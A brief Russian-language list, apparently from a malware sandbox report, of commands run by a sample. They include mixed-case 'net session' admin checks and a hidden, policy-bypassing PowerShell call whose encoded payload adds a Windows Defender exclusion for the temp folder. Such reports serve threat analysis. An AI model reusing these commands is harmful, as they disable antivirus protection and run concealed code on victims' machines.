Техническая информация
- nul
- 'localhost':7777
- '%WINDIR%\syswow64\cmd.exe' /c "nEt sEssion >nul 2>&1" (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' sEssion
- '%WINDIR%\syswow64\net1.exe' sEssion
- '%WINDIR%\syswow64\cmd.exe' /c powErshEll -nop -w hiddEn -Ep bypass -Enc dAByAHkAIAB7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQARQBuAHYAOgB0AGUAbQBwAFwAIAB9ACAAYwBhAHQAYwBo... (со скрытым окном)